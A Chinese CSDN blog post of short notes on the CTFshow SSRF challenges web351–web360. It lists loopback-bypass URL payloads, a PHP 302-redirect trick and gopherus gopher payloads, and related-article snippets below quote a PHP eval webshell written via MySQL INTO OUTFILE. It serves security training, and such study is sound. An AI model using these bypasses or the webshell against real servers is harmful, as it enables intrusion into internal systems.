CTFshow之SSRF

最新推荐文章于 2023-10-06 21:21:22 发布
最新推荐文章于 2023-10-06 21:21:22 发布
阅读量376 收藏
点赞数 1
分类专栏: CTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43085611/article/details/120105061
版权

文章目录

其他师傅都写得很详细了,只是做个简单的笔记。

1 web351

POST

url=file:///var/www/html/flag.php

2 web352

只限制了协议。

url=http://127.0.0.1/flag.php

3 web353

十六进制表示:

url=http://0x7F000007/flag.php

在线转换工具:https://tool.520101.com/wangluo/jinzhizhuanhuan/

4 web354

image-20210904192214123

不知道为什么服务器没有成功。A记录是127.0.0.1的网站: http://sudo.cc/,可以不用解析自己的。本来想使用 DNS 重绑定平台,但是我常用的那个平台现在不能用了。emm

url=http://sudo.cc/flag.php
  • (方便绑定IP)DNS重绑定平台:http://ceye.io/

5 web355

在 CTF从0到1 中有介绍这种利用方式

http://127.1/flag.php

6 web356

  • 127.0.0.1 的特殊写法
http://0/flag.php

7 web357

代码中检测了IP的范围,所以需要使用302或者DNS重绑定。

<?php
header("Location:http://127.0.0.1/flag.php");

8 web358

正则表达式的意思是以http://ctf.开头,以show结尾。

http://ctf.@127.0.0.1/flag.php?show

URL的结构如下:

img

9 web359

  • 使用 gopherus 生成 Payload
  • 把下划线后面的内容url编码一次
  • post:reurl=xxx

10 web360

方法同 web359

参考教程:

  • ctfshow-web入门 ssrf篇_volcano的博客-CSDN博客:https://blog.csdn.net/weixin_45696568/article/details/114434596
  • CTFSHOW SSRF篇_羽的博客-CSDN博客:https://blog.csdn.net/miuzzx/article/details/111992415
chiehw
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF 及漏洞修复方法 CVE-2014-4210 10.0.2,10.3.6
SSRF(通过时间判断) 点击保存头像,开启burpsuite抓包
最新发布
10-07
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种常见的网络安全漏洞,它允许攻击者利用服务器的网络权限发起对外部资源的请求。在这个场景中,通过时间延迟的判断方法,攻击者能够探测内网中的某些...
ctfshow--ssrf
ing_end的博客
04-23 3859
SSRF概述及其危害 *SSRF概述 ​ 强制服务器发送一个攻击者的请求 ​ 互联网上的很多web应用提供了从其他服务器(也可以是本地)获取数据的功能。使用用户指定的URL,web应用可以获取图片(载入图片)、文件资源(下载或读取)。如下图所示,百度提供识图功能。如果链接可以访问任意请求,则存在ssrf漏洞 ​ 用户可以从本地或者URL的方式获取图片资源,交给百度识图处理。如果提交的是URL地址,该应用就会通过URL寻找图片资源。如果web 应用开放了类似于百度识图这样的功能,并且对用户提供的URL和远端
ctfshow web入门ssrf359,360
xiaolong22333的博客
02-06 821
记录一下做法,原理啥的还有点懵 web359 打开是登录框,先随便输点什么,然后抓包 发现有个returl参数,并且可以随意更改url,这应该就是我们的利用点了 然后就是gopher协议打mysql,这里用到这个工具gopherus python gopherus.py --exploit mysql 生成一句话木马 select "<?php @eval($_POST['cmd']);?>" into outfile '/var/www/html/2.php'; 记得把_后面那一大段内
ctfshow web入门 SSRF
Sentiment的博客
12-09 743
web351
SSRF-CTFshow
unexpectedthing的博客
10-20 570
文章目录CTFshowweb351web352web353web354web355web356web357参考文献 CTFshow 对SSRF,比较重要的就是先尝试每一个协议是否可以使用。 web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url);//初始化一个curl的会话 curl_setopt($ch, CURLOPT_HEADER, 0);//对会话进行
ctfshow web入门ssrf
xiaolong22333的博客
04-28 880
其实刚接触时做过一遍,现在再做一遍巩固一下知识点 文章目录web351web352web353web354web355web356web357 web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1.
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_exSSRF漏洞测试、利用 SSRF vulnerability testing and utilizationSSRF[+] 服务端请求伪造,当作跳板攻击内网服务[+] 扫描内部网络、服务[+] 访问本机敏感文件[+] 向特定端口发送数据包、payload.├── ...
SSRF bible. Cheatsheet
08-06
SSRF bible. Cheatsheet SSRF attack and sockets presentation.
CTFSHOW SSRF
m0_64180167的博客
10-06 388
POST查看 flag.php即可。
ctfshow-web入门 ssrf篇
volcano的博客
03-06 2412
ctfshowSSRF简介危害web351web352parse_urlweb353更改IP地址写法web354web355web356web357web358web359(打无密码的mysql)web360(打redis) SSRF 简介 服务端请求伪造(Server Side Request Forgery, SSRF)指的是攻击者在未能取得服务器所有权限时,利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。 危害 SSRF可以对外网、
CTFshow-WEB入门-SSRF
feng的博客
02-18 1547
前言 开始学习SSRF,学习文章: SSRF 学习记录(需要fq) 比较简单的题目就直接放payload了,不做解释。 web351 url=http://127.0.0.1/flag.php web352 scheme必须是http或者https,但是不能有127.0.0.1或者localhost。这个绕过技巧很多了,列具一些常用的吧: 进制绕过 url=http://0x7F000001/flag.php 0.0.0.0绕过 url=http://0.0.0.0/flag.php 短标签绕过,但是这
ctfshow web入门(SSRF)
qq_53263789的博客
07-19 758
ctfshow
ctfshow SSRF web351-web360 wp
mumuzi的博客
02-10 3623
WDNMD(We Did Nothing Means Done)
CTFshow_Web_SSRF——web351~web360(除354、357)
Ho1aAs‘s Blog
03-18 1692
文章目录前言一、知识点Ⅰ、SSRF攻击点Ⅱ、gopher协议二、题解web351web352、353web355web356web358web359web360完 前言 354和357由于端口改变、服务器所限等原因,无法解出 一、知识点 Ⅰ、SSRF攻击点 <?php $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER,
ctfshowSSRF
遇事不决冲冲冲
10-02 3500
web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result=curl_exec($ch); curl_close($ch); echo ($result); ?> 没有防护直
CTFshow刷题日记-WEB-SSRF(web351-360)SSRF总结
Love&Share
09-28 5695
SSRF基础 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 相关函数和类 file_get_contents():将整个文件或一个url所指向的文件读入一个字符串中 readfile():输出一个文件的内容 fsockopen():打开一个网络连接或者一个Unix 套接字连接
ctfshow ssrf
08-16
- *3* [ctfshow ssrf](https://blog.csdn.net/weixin_52240463/article/details/122659261)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值